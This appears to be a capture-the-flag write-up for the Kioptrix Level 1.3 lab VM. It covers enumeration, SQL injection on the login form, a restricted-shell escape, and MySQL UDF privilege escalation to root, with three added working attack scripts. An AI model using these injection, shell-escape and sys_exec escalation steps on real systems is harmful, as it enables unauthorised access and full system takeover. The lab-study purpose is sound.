Thursday, June 7, 2018
Kioptrix - Level 1.3 (#4)
- Layout for this exercise:
1 - INTRODUCTION
- The goal of this exercise is the study of the hacking process for the vulnerable machine Kioptrix Level 1.3 (#4)
- Kioptrix Level 1.3 (#4) can be downloaded from here:
https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
- Once downloaded, extracted and opened with VMware:
2 - ENUMERATION
- First, netdiscover shows that the only host on the local network with a VMware MAC address is 192.168.1.14, so it should be the vulnerable machine Kioptrix:
- Scanning with Nmap:
- Using nbtscan:
- enum4linux discovers that there are at least 5 users: nobody, robert, root, john, loneferret.
- dirb scans the structure of the website:
- Browsing to the web server, there is a Member Login form:
- Images:
- john user's webpage:
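The enumeration steps above, gathered into one script, as an added example that is not part of the original write-up. It assumes the four tools are on the attacker's PATH and takes the target address from the TARGET variable; the parser for the enum4linux user list is exercised against a constructed sample so it can be checked without the target.

```shell
#!/bin/sh
# Added example, not the write-up's own commands.
# Usage: TARGET=192.168.1.14 sh enum.sh   (TARGET, OUT and the tools on PATH are assumptions)

OUT="${OUT:-./enum-out}"

# Run each scanner once and keep the raw output on disk for the later steps.
enumerate() {
    target="$1"
    mkdir -p "$OUT"
    nmap -sV -sC -oA "$OUT/nmap" "$target"
    nbtscan "$target" > "$OUT/nbtscan.txt"
    enum4linux -a "$target" > "$OUT/enum4linux.txt" 2>&1
    dirb "http://$target/" > "$OUT/dirb.txt"
}

# enum4linux prints SAMR users as lines such as:  user:[john] rid:[0x3eb]
# Read that output on stdin and print one unique username per line.
users_from_enum4linux() {
    sed -n 's/^user:\[\([^]]*\)\].*/\1/p' | sort -u
}

# Constructed sample of enum4linux output (the RIDs are made up) so the parser
# can be exercised offline; the user list is the one the page reports, with one
# duplicate added on purpose to show the de-duplication.
sample_enum4linux() {
    printf '%s\n' \
        'user:[nobody] rid:[0x1f5]' \
        'user:[robert] rid:[0x3ea]' \
        'user:[root] rid:[0x3e8]' \
        'user:[john] rid:[0x3eb]' \
        'user:[loneferret] rid:[0x3e9]' \
        'user:[john] rid:[0x3eb]'
}

# Only touch the network when a target was given; the users file feeds the
# SSH and web login attempts in the exploitation step.
if [ -n "${TARGET:-}" ]; then
    enumerate "$TARGET"
    users_from_enum4linux < "$OUT/enum4linux.txt" | tee "$OUT/users.txt"
fi
```

Run it once, then work from the saved files; re-scanning a lab box after every failed idea wastes time and the raw enum4linux output carries more (shares, OS version, password policy) than the user list extracted here.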
3 - EXPLOITATION
- Let's discover if there is a chance of SQL injection:
- The server's error message reveals that the login is handled by /var/www/checklogin.php, a path that could be of use later:
- Entering a basic SQL injection:
- Surprisingly, the password for user john is revealed:
- The same works for the user robert (beware: the password looks base64-encoded, which could be misleading; it is the literal password):
- However, there is no successful result for the rest of the users, for instance for user root:
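The injection test above, scripted, as an added example that is not part of the original write-up. It assumes the form posts the fields myusername and mypassword to /checklogin.php, that the script builds its query by string concatenation (the table and column names in vulnerable_query are assumptions used only to show the resulting query), and that a clean rejection prints "Wrong Username or Password" (configurable via FAIL_MARKER). The response classifier is checked against constructed response snippets.

```shell
#!/bin/sh
# Added example, not the write-up's own commands.
# Assumptions: form fields myusername/mypassword, script /checklogin.php,
# query built by concatenation, rejection text in FAIL_MARKER.

TARGET="${TARGET:-192.168.1.14}"
FAIL_MARKER="${FAIL_MARKER:-Wrong Username or Password}"

# What a concatenating checklogin.php sends to MySQL for the given input
# (table/column names assumed). With the tautology payload the trailing quote is
# swallowed by MySQL's # comment and "OR 1=1" makes the WHERE clause always true.
vulnerable_query() {
    printf "SELECT * FROM members WHERE username='%s' and password='%s'\n" "$1" "$2"
}

# POST one username/password pair; --data-urlencode takes care of quotes,
# spaces and the # in the payload.
login_probe() {
    curl -s --max-time 10 \
        --data-urlencode "myusername=$1" \
        --data-urlencode "mypassword=$2" \
        "http://$TARGET/checklogin.php"
}

# Classify a response body read from stdin: a MySQL syntax error or a PHP
# mysql_* warning means the input reached the query unescaped; the failure
# marker means a clean reject; anything else counts as a successful login.
classify_response() {
    body="$(cat)"
    if printf '%s' "$body" | grep -qiE 'sql syntax|mysql_'; then
        echo db-error
    elif printf '%s' "$body" | grep -qiF -- "$FAIL_MARKER"; then
        echo rejected
    else
        echo accepted
    fi
}

# Try the tautology payload against every enumerated user and report the outcome.
test_users() {
    for u in "$@"; do
        printf '%-12s %s\n' "$u" "$(login_probe "$u" "' OR 1=1 #" | classify_response)"
    done
}

if [ -n "${PROBE:-}" ]; then
    login_probe john "'" | classify_response   # a lone quote should yield db-error
    test_users john robert root loneferret nobody
fi
```

Send the lone quote first: a database error proves the input is concatenated into the query, while an "accepted" or "rejected" answer to a quote means the application escaped it and the tautology will not help. The payload is `' OR 1=1 #` rather than `' OR '1'='1` because the MySQL `#` comment also discards whatever the script appends after the password, such as a trailing quote or a LIMIT clause.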
- Now, let's use the credentials for connecting via SSH with users john and robert
- The shell that is available is very limited: it is lshell, a restricted shell that only allows a whitelist of commands:
- All information about lshell and how to bypass it:
https://www.aldeid.com/wiki/Lshell
- Trying to get a better shell by passing os.system('/bin/bash') through one of the allowed commands, echo (the bypass described at the link above):
4 - PRIVILEGE ESCALATION
- Checking what's inside the /home directory:
- It is interesting to see that there are some references to a MySQL database:
- Trying to connect to the database as root, we get a gift: the administrator never set a password for the MySQL root user:
- Showing databases:
- We find the same username/password information that we already knew:
- From the enumeration step we know that /var/www/checklogin.php has information about the login process:
- Opening /var/www/checklogin.php confirms that it connects to MySQL as root with an empty password, as expected:
- So, the conclusion is that the MySQL root account has no password, and the mysqld process itself is running as the system root user (this is the detail that matters for what follows; it can be checked with ps aux | grep mysql, since a UDF only runs commands with the privileges of the mysqld process).
- The approach to achieve Privilege Escalation will be to take advantage of the fact that the database is being run as root and is reachable with no password.
- We can run a User Defined Function (UDF) to execute commands on the underlying operating system:
http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html
- lib_mysqludf_sys is a UDF library with functions to interact with the execution environment in which MySQL runs.
- Luckily, it is already installed on this machine (the registered UDFs can be listed with SELECT name FROM mysql.func;).
- Otherwise it could be downloaded from here:
https://github.com/mysqludf/lib_mysqludf_sys
- One of the UDF functions is sys_exec, which executes arbitrary commands, for instance usermod -a -G admin john, which appends the user john to the admin group, the group granted sudo in /etc/sudoers; the new membership only applies to a new login session, so after reconnecting as john sudo gives root:
- Now, a root shell is achieved:
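The escalation steps above, scripted to run on the target as john after escaping lshell, as an added example that is not part of the original write-up. It assumes the mysql client is on the PATH, the MySQL root account has no password, mysqld runs as the system root user, lib_mysqludf_sys.so already sits in MySQL's plugin directory, and "admin" is the group /etc/sudoers grants sudo to; the two text checks (id output and sudoers line) are exercised on constructed samples so they can be verified without the box.

```shell
#!/bin/sh
# Added example, not the write-up's own commands. Runs on the target as john.
# Assumptions: mysql client on PATH, MySQL root with no password, mysqld running
# as root, lib_mysqludf_sys.so in @@plugin_dir, "admin" group has sudo rights.

mysql_root() { mysql -u root -N -B -e "$1"; }

# Every registered UDF is listed in mysql.func; check before creating one.
udf_registered() {
    [ "$(mysql_root "SELECT COUNT(*) FROM mysql.func WHERE name='$1'")" = "1" ]
}

# Register sys_exec if it is missing; the .so must already be in @@plugin_dir.
register_sys_exec() {
    udf_registered sys_exec && return 0
    mysql_root "CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so'"
}

# sys_exec runs the command with mysqld's privileges (root here) and returns
# only the exit status, so nothing the command prints comes back.
mysql_exec() { mysql_root "SELECT sys_exec('$1')"; }

# Text checks that need no target. id prints, for example:
#   uid=1000(john) gid=1000(john) groups=1000(john),104(admin)
in_group() {
    sed -n 's/.*groups=//p' | tr ',' '\n' | grep -q "^[0-9]*($1)$"
}
# A sudoers line giving a group unrestricted sudo looks like: %admin ALL=(ALL) ALL
sudoers_grants_group() {
    grep -Eq "^%$1[[:space:]]+ALL=\(ALL\)"
}

# Constructed samples (not taken from the box) for exercising the checks offline.
sample_id()      { printf 'uid=1000(john) gid=1000(john) groups=1000(john),104(admin)\n'; }
sample_sudoers() { printf '%%admin ALL=(ALL) ALL\n'; }

escalate() {
    user="${1:-john}"
    register_sys_exec || { echo "sys_exec is not available" >&2; return 1; }
    mysql_exec "usermod -a -G admin $user"
    if id "$user" | in_group admin; then
        echo "$user is now in admin; the group applies to a NEW session, so reconnect and run: sudo su -"
    else
        echo "usermod did not take effect (is mysqld really running as root?)" >&2
        return 1
    fi
}

if [ -n "${ESCALATE:-}" ]; then
    escalate "$ESCALATE"
fi
```

Run it as ESCALATE=john sh privesc.sh. Before relying on the admin group, confirm on the box that /etc/sudoers really grants it (sudo -l after reconnecting, or the sudoers check above against the real file); on a system where the group is named differently, usermod succeeds but sudo still refuses, and a more direct alternative with the same primitive is to have sys_exec write a sudoers line or copy a SUID shell instead.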
5 - CAPTURING THE FLAG
- Going to the /root folder: